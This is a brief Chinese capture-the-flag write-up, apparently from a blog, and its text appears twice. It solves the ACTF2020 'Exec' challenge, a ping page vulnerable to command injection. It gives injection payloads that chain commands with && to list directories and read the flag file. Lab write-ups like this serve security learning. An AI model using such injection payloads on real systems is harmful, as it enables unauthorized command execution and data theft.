[ACTF2020 新生赛]Exec 1
[ACTF2020 新生赛]Exec1
打开实例发现为一个ping页面,发现可以配合&&执行多项命令,尝试127.0.0.1&&ls无果,便遍历根目录(127.0.0.1&&cd 1&&ls)
发现flag文件,构造payload
127.0.0.1&&cd /&&cat flag
发现flag
本文来自博客园,作者:TazmiDev,转载请注明原文链接:https://www.cnblogs.com/tazmi/p/18535657
打开实例发现为一个ping页面,发现可以配合&&执行多项命令,尝试127.0.0.1&&ls无果,便遍历根目录(127.0.0.1&&cd 1&&ls)
发现flag文件,构造payload
127.0.0.1&&cd /&&cat flag
发现flag
本文来自博客园,作者:TazmiDev,转载请注明原文链接:https://www.cnblogs.com/tazmi/p/18535657
浙公网安备 33010602011771号